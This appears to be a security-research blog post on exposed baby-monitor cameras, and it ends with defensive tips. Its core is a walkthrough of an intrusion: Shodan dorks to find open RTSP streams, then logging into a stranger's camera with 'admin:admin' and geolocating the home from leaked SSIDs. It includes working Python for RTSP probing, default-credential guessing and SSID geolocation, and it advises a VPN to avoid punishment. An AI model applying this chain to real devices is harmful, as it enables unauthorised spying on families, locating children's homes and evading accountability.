Baby monitors expose not only the video stream but also the geolocation of your home
The Cooltechzone research team discovered several vulnerabilities at the end of September 2021. They particularly affect IP cameras used as baby monitors, revealing the owner's physical address and providing extensive information about the environment.
Most of the vulnerabilities found are associated with misconfigurations or a lack of cyber hygiene, but some could affect the whole home or small-company network, potentially giving access to any other device connected to that network.
Over 460,000 children go missing each year. Around 5,000 of those missing children are kidnapped (FBI).
Assuming that many parents leave their kids alone at home under the surveillance of baby monitors, we decided to share this research with you as fast as possible to spare you and your families undesirable consequences.
Disclaimer: Any data presented in this publication should not be used for any illegal actions against another person's physical and digital privacy. Copying, using, and distributing article materials without attribution is prohibited by copyright law.
We have prepared the following diagram to show the numbers at a glance.
We used a relatively simple method: searching for exposed baby monitors with the assistance of shodan.io.
As usual, we started with a comprehensive overview of the global situation and then moved closer to the target of our interest. The results were as follows:
- The first step was a search query for all devices using RTSP (Real Time Streaming Protocol) on the Internet at the time of research, namely "port:554". We found more than 4.5 million devices, so there is a choice for everybody. (Note that port:554 matches anything answering on the default RTSP port, so this count is an upper bound on actual RTSP servers.)
- The next step was already more towards the category of targeted devices. Asking Shodan about 'rtsp "200"' returned 1.6+ million devices whose stream is available for watching.
Usually, this also means watching the video stream without authentication: an RTSP server that requires credentials answers the DESCRIBE request with 401 Unauthorized rather than 200 OK.
Look at the left side. It is clear that 195,000+ devices are casting their streams from within the US. That is what is going to be more interesting.
- We used further dorks to query the Shodan search engine, and if everything is done right (but believe me, it is fairly hard to do it wrong), we see the following screen.
There we see precisely what we were looking for. And that is all on the first page of results!
Clicking around the output, I noticed a ratio of about 1 baby monitor to every 5 images, so roughly 20% of all output. That is where the approximation of 40,000 baby monitors comes from (20% of the 195,000+ US devices).
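To make the meaning of that "200" concrete, here is an added example (not from the original research, and not Shodan's own code) that builds an RTSP DESCRIBE request and classifies the reply the way a practitioner would before trusting the 'rtsp "200"' count: a 200 OK carrying an SDP body means the stream description was handed out without credentials, a 401 with a WWW-Authenticate header means the camera at least asks for a password, and a bare 200 (the kind an OPTIONS request gets even from a locked camera) proves nothing. The sample responses, the 192.0.2.x address and the realm string are constructed for the example; probe_rtsp is a plain-socket helper for checking a single host you are authorised to test.

```python
"""Build an RTSP DESCRIBE request and classify the reply (added example)."""
import re
import socket

# Constructed sample replies standing in for three kinds of camera banners.
SDP_BODY = (b"v=0\r\n"
            b"o=- 0 0 IN IP4 192.0.2.10\r\n"
            b"s=Camera\r\n"
            b"m=video 0 RTP/AVP 96\r\n")
SAMPLE_OPEN = (b"RTSP/1.0 200 OK\r\nCSeq: 1\r\nContent-Type: application/sdp\r\n"
               b"Content-Length: " + str(len(SDP_BODY)).encode() + b"\r\n\r\n" + SDP_BODY)
SAMPLE_LOCKED = (b"RTSP/1.0 401 Unauthorized\r\nCSeq: 1\r\n"
                 b'WWW-Authenticate: Basic realm="IP Camera"\r\n\r\n')
SAMPLE_OPTIONS_ONLY = b"RTSP/1.0 200 OK\r\nCSeq: 1\r\nPublic: OPTIONS, DESCRIBE, SETUP, PLAY\r\n\r\n"


def build_describe(url, cseq=1):
    """DESCRIBE is the request that a credential-protected server rejects with 401."""
    return (f"DESCRIBE {url} RTSP/1.0\r\n"
            f"CSeq: {cseq}\r\n"
            "Accept: application/sdp\r\n"
            "User-Agent: rtsp-banner-check\r\n"
            "\r\n").encode()


def classify_rtsp_response(raw):
    """Return status, auth scheme/realm and whether the stream was described openly."""
    text = raw.decode("latin-1", "replace")
    head, _, body = text.partition("\r\n\r\n")
    lines = head.split("\r\n")
    result = {"status": None, "open": False, "auth_scheme": None, "realm": None, "has_sdp": False}
    m = re.match(r"RTSP/\d\.\d\s+(\d{3})", lines[0])
    if not m:
        return result
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    result["status"] = int(m.group(1))
    www = headers.get("www-authenticate")
    if www:
        result["auth_scheme"] = www.split(None, 1)[0]
        realm = re.search(r'realm="([^"]*)"', www)
        result["realm"] = realm.group(1) if realm else None
    # Only a 200 that actually carries an SDP media description proves the stream
    # is served without credentials; OPTIONS also answers 200 on locked cameras.
    result["has_sdp"] = headers.get("content-type", "").startswith("application/sdp") and "m=" in body
    result["open"] = result["status"] == 200 and result["has_sdp"]
    return result


def probe_rtsp(host, port=554, path="/", timeout=5.0):
    """Send one DESCRIBE to a host you are authorised to test and classify the reply."""
    url = f"rtsp://{host}:{port}{path}"
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_describe(url))
        chunks = []
        while True:
            try:
                chunk = sock.recv(4096)
            except socket.timeout:
                break
            if not chunk:
                break
            chunks.append(chunk)
    return classify_rtsp_response(b"".join(chunks))


if __name__ == "__main__":
    for label, sample in (("open", SAMPLE_OPEN), ("locked", SAMPLE_LOCKED),
                          ("options-only", SAMPLE_OPTIONS_ONLY)):
        print(label, classify_rtsp_response(sample))
```

The practical check is the `open` field, not the status code alone: a camera can show "200" in a Shodan banner because it answered an OPTIONS request, while still demanding credentials for DESCRIBE and PLAY.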
While one person may say they have no secrets from anybody, even when it comes to a real-time video stream from their bedroom, another group of people really cares about this... unfortunately, still not seriously enough.
There are thousands of ways to find out the following data. Still, we are showing you how unsophisticated kidnappers can use publicly available services to discover a potential victim. Of course, this also applies to anybody with mental health problems or an average snooper.
- Don't be surprised! We can even identify the city based on the ISP information, but it is not that precise yet. I will come back to it later. Shodan actually provides a lot of valuable information for good purposes, but unfortunately also for destructive ones.
- You say “Coincidence!”, we say: “Take more!”
This time we got even two kids.
So, now we will look at something quite special.
And when I say special, I don't mean rare or extraordinary: this time it actually is a coincidence.
I was looking at the data on the screen. I accidentally saw a few interesting indicators, so I decided to give it a try. There are two important things in the following screenshot:
- port 80 is open, which tells us a web server is running on this device. I should admit that it is not available without authentication, but its being there is already 50% of success for us;
- Basic authentication is enabled with an extraordinary realm value; this looks like a cheap camera without proper configuration. Believe me or not, this is what we will see most of the time with baby monitors. (Basic authentication over plain HTTP also sends the username and password base64-encoded, not encrypted, on every request, so anyone on the network path can read them.)
Many of you have already turned your cameras off, but the rest of the readers want to know what comes next.
As you remember, in the last part of this research we found a compelling case for further investigation, this time at the level of the browser.
We are going to open the IP address of the found device in any available browser; we don't need any special equipment for this, and neither does anybody else.
From this moment on, we are moving to another dimension of research, where we communicate with the third-party system directly, without Shodan as an intermediary.
To protect yourself from being identified and punished, even if you did it for non-malicious purposes, I strongly recommend using a paid VPN service which guarantees a no-logs policy and good coverage of servers around the world.
You can use the comparison between ExpressVPN and NordVPN that we have done for you to decide on the best choice.
After opening the discovered IP in the browser, it asks me for a username and password, as expected, and as it should. Many systems can be found online even without basic authentication implemented or enabled.
Ten years ago, as today, many devices used standard credentials that are very weak and easy to brute-force.
You will be surprised, but the most commonly used credential pairs for security cameras, regardless of brand, are the following:
Amcrest, American Dynamics, Avigilon, Dahua, GeoVision, Intellio, Sony, etc.
Panasonic, LTS, Swann, HIKVision, 3xLogic
Admin:1234, 11111111:11111111, root:root, service:service
More default passwords can be found on the Internet, and not only on hacker forums.
I used the official website of the iSpy video surveillance application. They have a dedicated page on default credentials for different cameras.
First things first, we try the pair "admin:admin" to check whether this camera is protected.
Unfortunately, it is not, and we are in.
This welcome page doesn't reveal any data about the manufacturer or device model. It looks like my first website, written in plain HTML. Wait a minute, it is a plain HTML page, but anyway, let us click on the "PC view" link.
We are transferred to a dedicated page for live broadcasting from the camera, built on Flash technology, which has been discontinued and blocked by most Internet browsers for security reasons for years now.
Of course, we could find a Windows XP machine with Internet Explorer 7 or 8 to make it work, but our topic is slightly different. We don't care about the image and controls of the camera. All this was visible even without access to the admin console.
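As an added example (not the article's own tooling, and no real camera involved), here is a Python script that performs that default-credential check against a web console protected by HTTP Basic authentication, and shows why such a console is doubly weak: the Authorization header is only base64, so decode_basic_header recovers the password from any captured request. The credential list is the one quoted above; the stand-in camera (start_fake_camera) is a constructed local HTTP server that accepts one configured pair and otherwise answers 401 with a realm, so the script runs offline. Run try_default_credentials only against devices you own or are authorised to test; it stops at the first non-401 reply rather than hammering a device that may have started locking out.

```python
"""Default-credential check over HTTP Basic auth against a local stand-in camera (added example)."""
import base64
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Pairs quoted in the article, admin:admin first because it opened the camera.
DEFAULT_CREDENTIALS = [
    ("admin", "admin"),
    ("Admin", "1234"),
    ("11111111", "11111111"),
    ("root", "root"),
    ("service", "service"),
]


def basic_header(user, password):
    """Authorization value for HTTP Basic: base64(user:password), no encryption at all."""
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def decode_basic_header(value):
    """Recover the credentials from a captured Authorization header."""
    scheme, _, token = value.partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not a Basic authorization header")
    user, _, password = base64.b64decode(token).decode().partition(":")
    return user, password


def try_default_credentials(base_url, pairs=DEFAULT_CREDENTIALS, timeout=5.0):
    """Return the first pair the console accepts, or None. Stops on anything but 401."""
    for user, password in pairs:
        req = urllib.request.Request(base_url, headers={"Authorization": basic_header(user, password)})
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                if resp.status == 200:
                    return (user, password)
        except urllib.error.HTTPError as err:
            if err.code == 401:
                continue  # plain "wrong password": try the next pair
            return None  # 403/429/5xx: the device may be locking out, stop guessing
    return None


def make_camera_handler(user, password, realm):
    """Handler for the constructed stand-in camera: one valid pair, 401 otherwise."""
    expected = basic_header(user, password)

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            if self.headers.get("Authorization") == expected:
                body = b"<html><body>Welcome. <a href=\"/pc\">PC view</a></body></html>"
                self.send_response(200)
                self.send_header("Content-Type", "text/html")
                self.send_header("Content-Length", str(len(body)))
                self.end_headers()
                self.wfile.write(body)
            else:
                self.send_response(401)
                self.send_header("WWW-Authenticate", f'Basic realm="{realm}"')
                self.send_header("Content-Length", "0")
                self.end_headers()

        def log_message(self, *args):  # keep the demo quiet
            pass

    return Handler


def start_fake_camera(user="admin", password="admin", realm="IP Camera"):
    """Start the stand-in on a free loopback port; returns (server, base_url)."""
    server = ThreadingHTTPServer(("127.0.0.1", 0), make_camera_handler(user, password, realm))
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, f"http://127.0.0.1:{server.server_address[1]}/"


if __name__ == "__main__":
    server, url = start_fake_camera()
    try:
        print("accepted:", try_default_credentials(url))
    finally:
        server.shutdown()
```

The same function doubles as a self-audit: point it at your own camera's web console and, if it returns a pair, that pair is what the whole Internet can log in with.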
We are looking for the settings available over the web console. Sometimes they are drastically reduced over the Internet and primarily available through a LAN connection.
But that is not the case here. Look at this excellent info! The most interesting item is the Device Type code, from which we can quickly identify a HIPCAM device. The second interesting fact: the camera is connected via Wi-Fi.
We will look at the Network settings to check whether there is information about the Wi-Fi network.
Now we know the SSID of the active network, but also 10+ SSIDs of neighboring wireless networks. That is enough for us to identify the location of the broadcasting device.
We are going to use the website wigle.net to search for SSIDs observed over the last 10 years.
The output shows many SSIDs with exactly the same name. But since we also know the names of the nearest wireless networks, we can narrow down the search area to the spot where they all appear together.
After spending some time sorting and matching the output, we had the place.
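The narrowing step above, as an added example that is not the article's own method and does not call wigle.net: given records of the kind a wardriving database returns (every location where a given SSID name was ever seen), the camera's own SSID may match many places, but the neighbouring SSIDs read from the camera's Wi-Fi scan must all have been seen within a short walk of the right one. The records, SSID names and coordinates below are constructed; rank_candidates scores each sighting of the camera's SSID by how many neighbours were observed within radius_m of it, and locate reports a location only when one candidate wins clearly.

```python
"""Rank wardriving-style SSID sightings by neighbour co-occurrence (added example)."""
import math

# Constructed records in the shape {ssid: [(lat, lon), ...]}: every place the name was seen.
# "HOME_NET" (the camera's SSID) appears in three cities; only one of them also has the
# three neighbours from the camera's scan list within walking distance.
SAMPLE_RECORDS = {
    "HOME_NET": [(40.7128, -74.0060), (34.0522, -118.2437), (41.8781, -87.6298)],
    "NETGEAR42": [(40.7130, -74.0055), (41.8785, -87.6290)],
    "xfinitywifi": [(41.8776, -87.6305), (34.0600, -118.2500)],
    "Linksys_5G": [(41.8790, -87.6301)],
}
SAMPLE_NEIGHBOURS = ["NETGEAR42", "xfinitywifi", "Linksys_5G"]


def haversine_m(lat1, lon1, lat2, lon2):
    """Great-circle distance in metres."""
    r = 6371000.0
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = p2 - p1
    dlam = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlam / 2) ** 2
    return 2 * r * math.asin(math.sqrt(a))


def rank_candidates(own_ssid, neighbour_ssids, records, radius_m=150.0):
    """For every sighting of own_ssid, count neighbours seen within radius_m of it.

    Returns a list of (matches, lat, lon, matched_ssids), best first.
    """
    ranked = []
    for lat, lon in records.get(own_ssid, []):
        matched = sorted(
            n for n in neighbour_ssids
            if any(haversine_m(lat, lon, nlat, nlon) <= radius_m
                   for nlat, nlon in records.get(n, []))
        )
        ranked.append((len(matched), lat, lon, matched))
    ranked.sort(key=lambda c: (-c[0], c[1], c[2]))
    return ranked


def locate(own_ssid, neighbour_ssids, records, radius_m=150.0, min_matches=2):
    """Return (lat, lon) when one sighting clearly wins, else None (ambiguous or too weak)."""
    ranked = rank_candidates(own_ssid, neighbour_ssids, records, radius_m)
    if not ranked or ranked[0][0] < min_matches:
        return None
    if len(ranked) > 1 and ranked[1][0] == ranked[0][0]:
        return None
    return ranked[0][1], ranked[0][2]


if __name__ == "__main__":
    for cand in rank_candidates("HOME_NET", SAMPLE_NEIGHBOURS, SAMPLE_RECORDS):
        print(cand)
    print("best:", locate("HOME_NET", SAMPLE_NEIGHBOURS, SAMPLE_RECORDS))
```

A common neighbour name such as "xfinitywifi" on its own would not discriminate between cities; it is the intersection of several neighbours within one radius that collapses the candidate list to a single block. That is also why renaming your own SSID does not help once the camera leaks the neighbours' names.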
We can even walk around thanks to Google.
As you can see, we got very far starting only from the query 'rtsp "200"'.
I regret to say that this is not yet all, but I will not go further with practical attacks here and will present the remaining threats in theory.
As mentioned before, such attacks create a high risk of kidnapping.
Child sexual slavery is a serious problem in many developed countries. While video surveillance may help you keep a better eye on your children at home, your baby camera can become a weapon of your enemy without proper configuration and maintenance.
The protection of children is only one aspect. The second is about protecting the assets within the perimeter of your network.
Usually, there are not that many opportunities for remote attacks from the Internet involving vulnerabilities with a high CVSS score. But they exist, and considering the number of devices alone, we can only guess how wide the potential attack surface is.
Take one example: just a week ago, the researcher Watchful_IP reported a Remote Code Execution (RCE) vulnerability in HIKVISION products, listed as CVE-2021-36260 and scored 9.8 out of 10 on the CVSS scale.
This class of vulnerability makes it possible to take control of the breached device and execute commands on it as if you were sitting at a computer connected to the same LAN.
From there, there are many potential vectors for further attacks: man-in-the-middle with all its variants, reconnaissance, network discovery, and so on.
And all this without any kind of physical access by the malicious actor.
Looking again in Shodan, we find almost 5 million HIKVISION devices online globally, 750,000 of them within the US alone.
You can see here that Shodan was even able to flag vulnerabilities automatically (from the version strings in the banner). Suppose we are speaking about a vulnerability from 2013 here. How many people do you think updated the firmware on their devices right after the fixed firmware was released?
Or, better to ask, how many of them even know about the vulnerability and the solution?
Protecting baby monitors and other IP cameras is easy and challenging at the same time. We will give you some basic recommendations to help you reduce the risks to at least an appropriate level.
1. Check and update the firmware of your device immediately!
This principle will help you avoid becoming a victim in the long run. On many modern devices, firmware updates happen automatically without any action from the user, which is good and bad at the same time, but that is a topic for another research.
2. Configure and periodically change the administrator password on your device.
Many users are afraid of making changes to devices, even at home. While it can cause some inconvenience, remembering a long password, or using a secure password manager, creates excellent protection against snoopers and opportunistic attackers.
3. Enable all security functions, even if you don't want to understand every one of them.
This is a case where more is better. If your device supports specific security functions but you don't know how to use them properly, enable them all and check whether you are satisfied with the functionality. If yes, just leave those functions enabled.
It goes without saying that the information presented here is only the tip of the iceberg of private data breaches.
Every day we face the same old issues concerning our privacy. Some involve complex chains of highly professional manipulations of technology and people to reach the perpetrator's malicious goals, but sometimes we simply forget to change a default password on an Internet-connected device and thus give random people access to our lives, families and secrets.
We are already working on an even more severe issue, which we are going to present soon!
Stay tuned and watch around!